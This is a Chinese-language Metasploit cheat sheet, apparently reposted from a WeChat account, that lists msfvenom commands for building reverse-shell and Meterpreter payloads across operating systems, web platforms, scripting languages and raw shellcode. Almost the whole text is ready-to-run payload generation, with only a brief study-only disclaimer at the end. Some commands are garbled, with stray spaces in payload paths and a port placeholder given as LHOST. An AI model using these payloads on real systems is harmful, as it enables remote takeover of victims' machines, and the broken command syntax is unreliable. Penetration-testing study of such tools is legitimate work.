Metasploit-有效负载备忘单
“MSF生成各种有效负载的命令备忘录,建议收藏,忘了就拿出来多看看!”
列出有效载荷:
msfvenom -l
二进制文件
Linux:
代码语言:javascript复制msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <要连接端口> -f elf> shell.elf
Winodw:
代码语言:javascript复制msfvenom -p windows / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f exe> shell.exe
Mac:
代码语言:javascript复制msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f macho> shell.macho
android://需要签名
代码语言:javascript复制msfvenom -a x86 --platform Android -p android/meterpreter/reverse_tcp LHOST=<IP地址> LPORT=<连接的端口> -f apk -o payload.apk
powershell:
代码语言:javascript复制msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=<连接的端口> LPORT=<连接的端口> -e cmd/powershell_base64 -i 3 -f raw -o payload.ps1
网络有效载荷
PHP
代码语言:javascript复制msfvenom -p php / meterpreter_reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f raw> shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d 'n' > shell.php && pbpaste >> shell.php
asp
代码语言:javascript复制msfvenom -p windows / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f asp> shell.asp
JSP
代码语言:javascript复制msfvenom -p java / jsp_shell_reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f raw> shell.jsp
War:
代码语言:javascript复制msfvenom -p java / jsp_shell_reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f war> shell.war
nodejs:
代码语言:javascript复制msfvenom -p nodejs/shell_reverse_tcp LHOST=<IP地址> LPORT=<连接的端口> -f raw -o payload
ruby:
代码语言:javascript复制msfvenom -p ruby/shell_reverse_tcp LHOST=<IP地址> LPORT=<连接的端口> -f raw -o payload.rb
lua:
代码语言:javascript复制msfvenom -p cmd/unix/reverse_lua LHOST=<IP地址> LPORT=<连接的端口> -f raw -o payload.lua
脚本有效负载
Python:
代码语言:javascript复制msfvenom -p cmd / unix / reverse_python LHOST = <IP地址> LPORT = <连接的端口> -f raw> shell.py
sh脚本
代码语言:javascript复制msfvenom -p cmd / unix / reverse_bash LHOST = <IP地址> LPORT = <连接的端口> -f raw> shell.sh
Perl
代码语言:javascript复制msfvenom -p cmd / unix / reverse_perl LHOST = <IP地址> LPORT = <连接的端口> -f raw> shell.pl
Shellcode
基于Linux的Shellcode
代码语言:javascript复制msfvenom -p linux / x86 / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f <语言>
基于Windows的Shellcode
代码语言:javascript复制msfvenom -p windows / meterpreter / reverse_tcp LHOST = <IP地址> LPORT = <连接的端口> -f <语言>
基于Mac的Shellcode
代码语言:javascript复制msfvenom -p osx / x86 / shell_reverse_tcp LHOST = <IP地址> LPORT = <要连接的端口> -f <语言>
对于所有shellcode,请参阅“ msfvenom –h”以获取有关有效参数的信息。Msfvenom将输出能够以这种语言剪切和粘贴的代码,来供利用。
为了安全请将工具放在虚拟机运行!
作者不易!请点一下关注在走吧!
请严格遵守网络安全法相关条例!
此分享主要用于学习,切勿走上违法犯罪的不归路,一切后果自付!
转载此文章,请标明出处。
关注此公众号,各种福利领不停,轻轻松松学习hacker技术!